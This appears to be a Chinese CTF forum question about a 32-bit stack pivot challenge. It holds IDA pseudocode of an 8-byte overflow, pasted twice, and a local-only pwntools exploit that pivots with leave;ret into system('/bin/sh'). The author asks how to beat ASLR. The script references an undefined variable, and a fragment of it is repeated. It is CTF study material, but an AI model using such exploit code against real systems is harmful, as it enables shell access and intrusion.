IDA反编译结果:只有8个字节的溢出位,只能覆盖EBP和返回地址,看来是要栈迁移
如果利用一次leave ret把ESP迁移到BSS,那么也没有机会在BSS上写好栈内容! 所以不知道怎么做。请教各位大佬有没有什么办法。
下面是非正解:把系统的ASLR关了,用固定的栈地址做迁移,在本地getshell。但是如果打开ASLR,实际情况有几个问题:1. 栈地址无法获取;2. libc版本不明;3. libc_base无法获取。
以上exp只能在本地关闭ASLR的情况下才能生效。请大佬想想其他的思路。
/*
 * IDA pseudo-code of the challenge binary's main() as posted (decompiler
 * output, not hand-written source; the __cdecl keyword is IDA's).
 *
 * Behaviour visible here: both stdio streams are switched to mode 2 by
 * setvbuf (presumably _IONBF, i.e. unbuffered -- confirm against the target
 * libc), a fixed prompt is printed, and a single read(2) from fd 0 fills the
 * local buffer. Nothing derived from the input is printed afterwards, so the
 * program gives no feedback about what it read.
 *
 * Why this is the bug under discussion: IDA places buf at [ebp-100h], i.e.
 * 0x100 bytes below the saved frame pointer, but the read count is 0x108. A
 * full-length read therefore writes 8 bytes past the buffer, over the saved
 * EBP and the return address. In source form the fix would be a read count
 * bounded by the real buffer size (or a buffer at least as large as the
 * count); the return value of read() should also be checked.
 */
int __cdecl main()
{
    char buf; // [esp+0h] [ebp-100h]  -- IDA stack annotation: 0x100 bytes below saved EBP
    /* Unbuffered stdio on both streams (mode 2, presumably _IONBF). */
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    puts("Sorry,but there is no output!!\nJust Input Something:");
    /* Fixed-size, unchecked read: up to 0x108 bytes into a slot that is only
     * 0x100 bytes from the saved frame pointer; short reads/errors ignored. */
    read(0, &buf, 0x108u);
    return 0;
}
/*
 * IDA pseudo-code of the challenge binary's main() as posted (decompiler
 * output, not hand-written source; the __cdecl keyword is IDA's).
 *
 * Behaviour visible here: both stdio streams are switched to mode 2 by
 * setvbuf (presumably _IONBF, i.e. unbuffered -- confirm against the target
 * libc), a fixed prompt is printed, and a single read(2) from fd 0 fills the
 * local buffer. Nothing derived from the input is printed afterwards, so the
 * program gives no feedback about what it read.
 *
 * Why this is the bug under discussion: IDA places buf at [ebp-100h], i.e.
 * 0x100 bytes below the saved frame pointer, but the read count is 0x108. A
 * full-length read therefore writes 8 bytes past the buffer, over the saved
 * EBP and the return address. In source form the fix would be a read count
 * bounded by the real buffer size (or a buffer at least as large as the
 * count); the return value of read() should also be checked.
 */
int __cdecl main()
{
    char buf; // [esp+0h] [ebp-100h]  -- IDA stack annotation: 0x100 bytes below saved EBP
    /* Unbuffered stdio on both streams (mode 2, presumably _IONBF). */
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    puts("Sorry,but there is no output!!\nJust Input Something:");
    /* Fixed-size, unchecked read: up to 0x108 bytes into a slot that is only
     * 0x100 bytes from the saved frame pointer; short reads/errors ignored. */
    read(0, &buf, 0x108u);
    return 0;
}
# Author's local-only proof of concept for the './nooutput' binary (pwntools,
# Python 2 -- see the `.next()` iterator call below). Every address it relies
# on is hard-coded, which is exactly why it only works on the author's own
# machine with ASLR disabled: libc_base and stackAddr are values observed once
# locally, nothing is leaked from the target, and the libc offsets come from
# the local /usr/lib32/libc.so.6 rather than from the remote libc.
from pwn import *

context(arch='i386', os='linux')
# Terminal used by gdb.attach(); no gdb.attach call appears in this script.
context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
# Address of a `leave; ret` gadget in the non-PIE binary (0x0804xxxx text).
leaveret_add = 0x08048514
p = process('./nooutput')
# Local 32-bit libc, used only for symbol offsets; a different libc on the
# target invalidates every address derived below (the author's point 2).
lib = ELF("/usr/lib32/libc.so.6")
libc_base = 0xf7dcd000   # hard-coded: only valid locally with ASLR off (author's point 3)
# Consume the prompt printed by the binary's puts() call.
p.readuntil('Something:\n')
# Hard-coded stack address used as the pivot target -- presumably the address
# of buf in the target's frame as observed locally (author's point 1).
stackAddr = 0xffffd498
log.info(hex(stackAddr))
sysAddr = libc_base + lib.symbols['system']
exitAddr = libc_base + lib.symbols['exit']
binsh = libc_base + lib.search("/bin/sh").next()   # Python 2 iterator idiom
# Payload, 0x108 bytes to match the binary's read count:
#   bytes 0x000..0x0ff : fake frame placed in buf (the first 16 bytes are the
#                        dword popped into EBP by the second `leave`, then the
#                        system() address, its return address exit(), and the
#                        "/bin/sh" pointer), padded to 0x100 bytes
#   bytes 0x100..0x103 : saved EBP <- stackAddr
#   bytes 0x104..0x107 : return address <- leave;ret, which moves ESP to
#                        stackAddr and returns into the fake frame above
exploit = p32(0x90909090)
exploit += p32(sysAddr)
exploit += p32(exitAddr)
exploit += p32(binsh)
# NOTE(review): `nops` is not defined anywhere in the script as pasted, so this
# line raises NameError as shown; presumably a one-byte filler string was
# defined in the original file -- confirm.
exploit += nops * (0x100 - len(exploit))
exploit += p32(stackAddr)
exploit += p32(leaveret_add)
# sendline appends '\n'; the binary reads exactly 0x108 bytes, so the trailing
# newline stays unread.
p.sendline(exploit)
p.interactive()
# Preamble of the author's pwntools script as it appears a second time on the
# page; the listing stops after the gadget address, so nothing below is run.
from pwn import *

# Target is a 32-bit Linux binary; context.update() is what context(...) calls.
context.update(arch='i386', os='linux')
# Terminal used by gdb.attach() should it be invoked later.
context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
# `leave; ret` gadget address in the non-PIE binary.
leaveret_add = 0x08048514